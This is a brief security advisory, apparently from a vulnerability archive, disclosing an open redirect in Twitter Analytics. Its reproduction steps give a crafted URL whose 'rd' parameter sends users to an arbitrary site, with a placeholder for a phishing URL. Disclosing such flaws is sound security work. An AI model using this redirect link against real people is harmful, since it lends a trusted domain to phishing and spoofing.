Twitter Analytics Open Redirect

2020.10.09

Credit: asheesh anaconda

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-601

================================================================================Twitter Analytics Open Redirect Vulnerability  
================================================================================

# Credit by Asheesh Anaconda

Description

An open redirect vulnerability exists in Twitter Analytics that could
lead to spoofing. To exploit the vulnerability, an attacker could send a
link that has a specially crafted URL and convince the user to click the
link.

Steps To Reproduce:

Replace the phishing url with any website
http://analytics.twitter.com/daa/0/daa_optout_actions?action_id=3&&rd=<phishing
url>
http://analytics.twitter.com/daa/0/daa_optout_actions?action_id=3&&rd=https://www.google.com

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Twitter Analytics Open Redirect

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Twitter Analytics Open Redirect

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.